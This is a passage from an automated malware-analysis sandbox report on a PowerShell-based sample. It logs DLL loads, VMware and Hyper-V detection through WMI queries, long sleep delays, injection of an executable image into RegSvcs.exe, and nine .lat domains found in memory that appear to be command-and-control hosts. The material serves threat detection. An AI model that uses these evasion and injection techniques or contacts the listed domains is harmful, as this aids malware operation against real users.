          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.1913078842.0000026AD6A30000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.1876839160.0000026ABE9A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1876839160.0000026ABF967000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B8A0952 push E95B7BD0h; ret 0_2_00007FFD9B8A09C9
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B8AD5CE push 69FFFFFFh; iretd 0_2_00007FFD9B8AD5D3
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B972B32 pushad ; ret 0_2_00007FFD9B972B59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00441860 push eax; mov dword ptr [esp], 424D4C7Fh4_2_00441864
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0043A6F5 push esi; retf 4_2_0043A6FE
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem information queried: FirmwareTableInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4866Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4960Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep time: -15679732462653109s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: Amcache.hve.0.drBinary or memory string: VMware
          Source: Amcache.hve.0.drBinary or memory string: VMware Virtual USB Mouse
          Source: Amcache.hve.0.drBinary or memory string: vmci.syshbin
          Source: Amcache.hve.0.drBinary or memory string: VMware, Inc.
          Source: Amcache.hve.0.drBinary or memory string: VMware20,1hbin@
          Source: Amcache.hve.0.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
          Source: Amcache.hve.0.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.0.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
          Source: RegSvcs.exe, 00000004.00000002.1874485060.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.1874616021.0000000001226000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: Amcache.hve.0.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.0.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
          Source: Amcache.hve.0.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.0.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.0.drBinary or memory string: vmci.sys
          Source: Amcache.hve.0.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
          Source: Amcache.hve.0.drBinary or memory string: vmci.syshbin`
          Source: Amcache.hve.0.drBinary or memory string: \driver\vmci,\driver\pci
          Source: Amcache.hve.0.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.0.drBinary or memory string: VMware20,1
          Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Generation Counter
          Source: Amcache.hve.0.drBinary or memory string: NECVMWar VMware SATA CD00
          Source: Amcache.hve.0.drBinary or memory string: VMware Virtual disk SCSI Disk Device
          Source: Amcache.hve.0.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
          Source: Amcache.hve.0.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
          Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: Amcache.hve.0.drBinary or memory string: VMware PCI VMCI Bus Device
          Source: Amcache.hve.0.drBinary or memory string: VMware VMCI Bus Device
          Source: Amcache.hve.0.drBinary or memory string: VMware Virtual RAM
          Source: Amcache.hve.0.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
          Source: Amcache.hve.0.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004402D0 LdrInitializeThunk,4_2_004402D0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: powershell.exe, 00000000.00000002.1899228901.0000026ACE7F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: finickypwk.lat
          Source: powershell.exe, 00000000.00000002.1899228901.0000026ACE7F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: shoefeatthe.lat
          Source: powershell.exe, 00000000.00000002.1899228901.0000026ACE7F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: savorraiykj.lat
          Source: powershell.exe, 00000000.00000002.1899228901.0000026ACE7F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: kickykiduz.lat
          Source: powershell.exe, 00000000.00000002.1899228901.0000026ACE7F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: miniatureyu.lat
          Source: powershell.exe, 00000000.00000002.1899228901.0000026ACE7F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: leggelatez.lat
          Source: powershell.exe, 00000000.00000002.1899228901.0000026ACE7F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: washyceehsu.lat
          Source: powershell.exe, 00000000.00000002.1899228901.0000026ACE7F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: bloodyswif.lat
          Source: powershell.exe, 00000000.00000002.1899228901.0000026ACE7F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: curtainykeo.lat
